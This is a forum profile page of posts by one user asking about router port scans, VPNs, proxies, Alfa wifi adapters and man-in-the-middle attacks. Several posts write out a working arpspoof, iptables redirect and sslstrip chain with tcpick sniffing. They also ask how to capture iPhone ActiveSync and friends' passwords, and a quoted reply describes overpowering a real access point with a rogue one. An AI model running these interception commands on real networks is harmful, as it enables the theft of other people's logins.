michael_kent123
-
Posts
96 -
Joined
-
Last visited
Posts posted by michael_kent123
-
-
I will check out the video over the weekend.
One more thing that I kind of but not completely understand.
I have SSH installed on my computer. If I ssh to my IP address provided by my ISP then the connection fails. However, if I connect to my VPN and then ssh to the VPN IP, I get a connection. I can login to my system using the password I use to login to my computer.
I'm assuming that's how SSH is supposed to work (it's as if I was contacting my IP from a remote system) and the VPN has allowed its users to SSH to their home computers via the VPN IP. Does that make sense? Are there any security implications?
Many thanks!
-
Thanks for the information - I've done some more research as you suggested.
I scanned my external IP from inside my LAN:
Not shown: 997 closed ports
PORT STATE SERVICE
23/tcp open telnet #
1900/tcp open upnp # Upnp is turned off on the router so I don't know why this is open.
40001/tcp open unknown # This is the way I connect to the router 192.168.1.1:40001I scanned my external IP from my VPN IP:
Note: Host seems down. If it is really up, but blocking our ping probes, try -PN
Nmap done: 1 IP address (0 hosts up) scanned in 3.21 secondsI typed my external IP:40001 into the browser and, when using the VPN, it timed out. When I typed my external IP:port in (without using a VPN) it brought up the login screen. So my impression is that the router is not accessible from the internet.
-
I have a TP-Link router and recently ran an nmap scan on it from inside my network. I'm not too worried about the results as I have turned remote admin off so the router is inaccessible from the internet. I am using the Ubuntu OS.
Nonetheless, there are a few things I do not understand. Here are my results:
23/tcp open telnet
1900/tcp open upnp
2000/tcp open cisco-sccp
2001/tcp open dc
9000/tcp open cslistenerTelnet makes sense; it's a way to connect to the router.
Upnp I understand but, even though I've disabled it in the admin panel, it still shows "open". Maybe nmap is supposed to show it as open, even though it's closed from the perspective of the router. I don't know.
Sccp (https://en.wikipedia.org/wiki/Skinny_Call_Control_Protocol) is a Cisco protocol which makes no sense to me as I don't have a Cisco router unless TP-Link has paid to use this proprietary protocol.
Dc seems very mysterious and no-one seems to know what it is.
Cslistener (http://brianoneill.blogspot.com/2012/02/cslistener-on-mac-osx-on-port-9000.html) maybe the Checkpoint firewall which I have not installed.
More generally, is there a way to run a netstat like command on the router IP. I can telnet to it but I can't run commands like netstat to check what is happening on these ports from the router's perspective.
Any ideas?
-
I finally tried tcpick but had no success. Here is what I did.
Terminal 1:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
arpspoof -i wlan0 192.168.1.1 [router IP]
Terminal 2:
sslstrip -l 10000 -k
Terminal 3:
sudo tcpick -i wlan0 -bPS -C "port 443"
Terminal 4:
sudo tcpick -i wlan0 -bPC -C "port 443"
I then sent an e-mail from a different device to a Hotmail address which was setup on my iPhone with ActiveSync.
Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log).
The tcpick server shows content like:
...r......Y.t~swj......t..J...$.#.
.k.g.9.3...=.<.5./...&.%.......*.).....
...............C.........bay405-m.hotmail.com.
.................
..........3t..
....f...ba..L!g..Q*..fA '. +........7............x..[q..Z.J...}K........
\...%S2F..q.*X..._.T}v{......|FE..
......
The tcpick client just showed connections to Microsoft's IP addresses.
For example:
SYN-SENT 192.168.1.10:51999 > 207.46.11.152:https
SYN-SENT 192.168.1.10:53999 > 207.46.11.152:https
RESET 192.168.1.10:51999 > 207.46.11.152:https
RESET 192.168.1.10:51999 > 207.46.11.152:https
I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown. Just IP addresses.
Any ideas? Thanks. -
maybe sniff the traffic with another tool...
Tcpick -i wlan0 -bPS -C
in a second terminal
Tcpick -i wlan0 -bPC -C
Sourceforge is down atm but I'll look into this.
How does it sniff / intercept / overcome SSL communications?
-
Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync
Basically, it is the way in which iPhone users setup their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details.
Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites.
Here is how I setup SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone.
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
arpspoof -i wlan1 gateway_ip
sslstrip -l 10000 -k
I then sent an e-mail from a different device to the iPhone. I used Wireshark which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password was sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range 207.46.0.0 - 207.46.255.255 which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols.
There is also a transmission to 132.245.0.0 - 132.245.255.255 which is Microsoft using IMAPS.
However, when I checked the SSL Strip log, nothing was recorded. Obviously, using ActiveSync is not the same as logging into a HTTPS website. But ActiveSync does use HTTPS so I thought that SSL Strip might work. Clearly I was wrong.
Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is setup with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.
-
On a related note, I wonder if you know anything about Microsoft Active Sync.
I set up a Hotmail account on my iPhone. To connect to the server, Microsoft apparently uses HTTPS on port 443. See, for example, http://www.altn.com/Support/FAQ/FAQResults/?Number=KBA-02281
I used arpspoof and SSLStrip in the normal way (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000).
I then sent an e-mail from my Desktop to my Hotmail account on my iPhone. The phone downloaded the message.
However, when I checked the SSLStrip log, nothing showed.
When, on the iPhone, I login to a webmail account (port 443) the username:password does show in my log.
I'm wondering if there is a way to intercept the username:password between Hotmail on the iPhone using SSLStrip.
Any ideas? Thanks!
-
Isn't it also true that you can't inject unless you're in promiscuous mode?
Yes. My impression is that, with the Alfa, monitor mode is promiscious mode.
It's just a question of terminology.
-
To use SSL Strip:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000Why is the destination port 80 since we want to redirect HTTPS traffic. Shouldn't it be port 443?
Let's say I want to intercept secure POP which uses port 995.
Can I just do:
iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-port 10000
Or should it be port 110 (POP) considering that HTTPS apparently uses port 80 (not 443)?
-
Promiscuous mode - ability to see packets on the wifi network you are connected to that are not directed to your MAC.
Monitor mode - ability to see packets on wifi networks to which you are not connected but that your NIC can sniff.
However, since modern networks are switches rather than hubs, promiscuous mode no longer really exists.
Therefore, am I correct when I say that:
Monitor mode is like promiscuous mode for the network you are connected to plus you can also view nearby networks.
So, if I am on SSID "Hello" and my friend is on "Hello" and he sends a non-SSL username:password to his e-mail provider, and I am in monitor mode, then I can view that password in Wireshark.
Is that correct? Thanks!
-
The other issue I wanted to ask is about increasing power via antennas. I know nothing about antenna theory. I have a 9 dBi antenna for the Alfa.
What is the most powerful indoor antenna I can get for the Alfa (i.e. not having to attach it to the side of a house).
Does the antenna affect only tx power or also the ability to receive better?
-
Think of the wifi adapter as a megaphone, measured in decibels. The non-deaf people around you are the various wifi radios nearby, beit clients or APs. The tx power is the volume knob on the megaphone, and the effect it would have on the people around you is the same effect it would have on the radios nearby.
So with a higher transmission power your outbound signal travels further and is more likely to overpower the other signals (at the same frequency).
- You can inject packets more reliably because when you and the legitimate transmitter send the data at the same time, your signal is more likely to overpower the legitimate one and because of this end up being the signal actually heard by the receiver.
- You can transmit your data over a greater distance.
- It has no effect on your receiving capability, so you won't pick up any more packets than you did previously.
You want to ARP spoof once you MITM'd a connection. Having a higher transmission power means you can appear 'closer' to the client making it want to prefer your signal over the legitimate one and even allowing you to overpower the legitimate signal because you're 'louder'. Once you're in between you can pull out your usual bag of tricks and go play as you would otherwise, which might involve arp spoofing.
Is there any reason therefore not to increase the tx power to 30? It seems to only do good things.
More specifically, if one created a "soft" or fake AP, a higher tx power would presumably overcome the "real" signals from the genuine AP?
-
Thanks - this is a helpful explanation.
There is a thread in the Pineapple section on the best Alfa for Pineapple. I am wondering what the best Alfa is for those of us who want to use it for arpspoofing, packet injection, etc.
In terms of tx power, a poster seems to be suggesting that one Alfa model can provide 2 dBi. I don't understand this if you can only alter the tx power to 30 (using iw reg set BO).
Thanks again!
-
I was recently watching a video by Vivek Ramachandram on how to increase the tx power of the Alfa card.
Question: what is the benefit of this?
Does it allow the Alfa to "see" networks that are further away?
Does it allow for packet injection over a further distance?
Does it give a benefit for arpspoofing e.g. being able to transmit the fake MAC of the router over a greater distance?
Can someone please articluate the benefits of tx power 30 over, say, tx power 20.
-
I highly dislike the AWUS036NEH adapter i find it to be less stronger at picking up networks then my AWUS036H i've got 4 wireless adapters out of all of them i get the best signals from my alfa network AWUS036H its the silver one legit alfa with the sticker the one hak5 sells it doesn't pick up networks as good i'd say i lose 2 bars compared to the AWUS036H
I have a AWUS 036H which I'm happy with. I'm going to buy another card.
I would predominantly use it for accessing wifi, arpspoofing, and packet injection.
Should I get another 036H or something else?
-
The neh is low power consumption and max 1watt, and is in a smaller case. The nh is higher power consumption and 2watt and in a bigger case
Are there any benefits to 2 watts which is, I believe, 33 dBm.
After all, the maximum txpower can be set to is 30dBm (iw reg set BO).
-
I have an Alfa AWUS036H which is, I guess, at least five years old. I want to buy an additional Alfa but have noticed there are multiple versions. A search on this forum reveals:
AWUS036NEH
AWUS036NHR
AWUS036H
AWUS036NHA
AWUS036A
There are numerous other versions here.
I also purchased a 9dBi antenna so what ever I get needs to be able to add an antenna.
If you were buying an Alfa for airmon-ng mode, packet injection, etc, what version would you get?
-
Some sites like facebook these days, uses HSTS, so they won't load without SSL on most of them. For those, you can use a captive portal attack to clone and fake the login page to and then sever to end users if you own the network and their connections with a MITM and dns rebinding, but for things like your iPhone apps and such, you'll need to grab the token or process it uses to login with your stored credentials and may not be simple https logins happening since the apps for different sites may use other login methods and protocols with encryption client side. Depending on how well they protect the process, you'd most likely need an app on the device to read the info for you vs trying to pull an external MITM, but a local one from memory attacks to intercepting the data being sent over the pipe may show more what is going on and what you can do to gain access to their authentication mechanisms.
Kos demoed an attack for Android devices that showed how google used a simple URL and token to authenticate devices and access google user accounts, but that may be patched now(don't quote me on that). His example of how this was done is in an episode of Hak5 few seasons back.
Thank you for the answer.
I have a couple of questions. I've read about HSTS (https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security). The article claims that HSTS defeats SSL Strip. I don't understand this because, using the latest version of both IE and FF, I just successfully stripped my HTTPS connections to websites like Facebook and Gmail.
What I still don't understand is how the app validates the user. Is the user's username and password being sent to a server as in the traditional client / server model?
-
I have wondered for some time how apps (e.g. Facebook, Twitter, or Instagram) on an iPhone on Android device transmit the username and password.
For example, if I am using a laptop and want to login to Facebook then I browse to https://www.facebook.com and enter my username and password which is transmitted to Facebook which checks whether it is accurate or not.
However, if I use the Facebook app, how is the username and password invoked?
If you are a MITM and you intercept client-server communications (e.g. with SSL Strip) then you can get my Facebook username and password. However, if I am using an app (over wireless) to login to Facebook then can you as the MITM grab my login details?
In all cases, we are using a wireless network.
-
Thanks.
So, in other words, HTTP can only do HTTP/S but SOCKS can do SSH (for example) and also HTTP/S.
Yes?
-
Hello,
I have wondered for some time about the difference between proxy types.
For example, Tor uses SOCKS 5. On the other hand, I can find lists of proxies and enter the IP:port into the HTTP proxy section of Firefox.
What is the difference in practical usage between a HTTP proxy and a SOCKS 5 proxy?
How are these proxies used? Are they used for different purposes? What are their advantages and disadvantages?
Thank you.
-
I have a question about the use of VPN services.
If you go to www.whatismyip.com or equivalent then you see the VPN IP not the ISP IP.
Normally, I have an internal 192.168.x.x IP and my ISP IP. With a VPN, I have the internal IP and the VPN IP.
So, when using a VPN, does that mean that there is no ISP IP but only an internal IP and a VPN IP? In other words, does the VPN effectively replace the ISP IP with its IP?
Is it:
a) 192.168.x.x --> VPN IP.
or
b) 192.168.x.x --> ISP IP --> VPN IP.
Thank you!
-
I take your point. I was so used to having shared IPs that I forgot that the VPS means that only I use a specific IP!
-
Here is something I do not understand even though I'm sure there is a simple answer.
I SSH to my VPS. This VPS has not had DNS propagation started. I can only access it via an IP address. I upload some files to /var/www/
I then go in the web browser to the VPS IP. I can see the files e.g. index.html.
Here is what I do not understand.
How does the web browser know the correct content to serve me? Presumably, I am not the only person using that IP address.
If I were to have linked the domain name to the IP via DNS propagation, then my domain panel would point to the nameservers of the VPS and I would have entered my domain name in the VPS control panel. Hence, when I request www.domain.com, I am given the correct files as the domain name and IP are linked.
But in this case, I just type http://50.50.50.50/index.html. How does the VPS know what to give me? The files are stored on their servers. I do not host anything in my /var/www/ directory.
Can anyone suggest what these strange ports open on my router do?
in Questions
Posted
Well, yes, but they would have to know the password. When I SSH to the VPN IP, it asks me for my password. Unless the password to my system is obvious, I don't see a problem. Or am I too naive?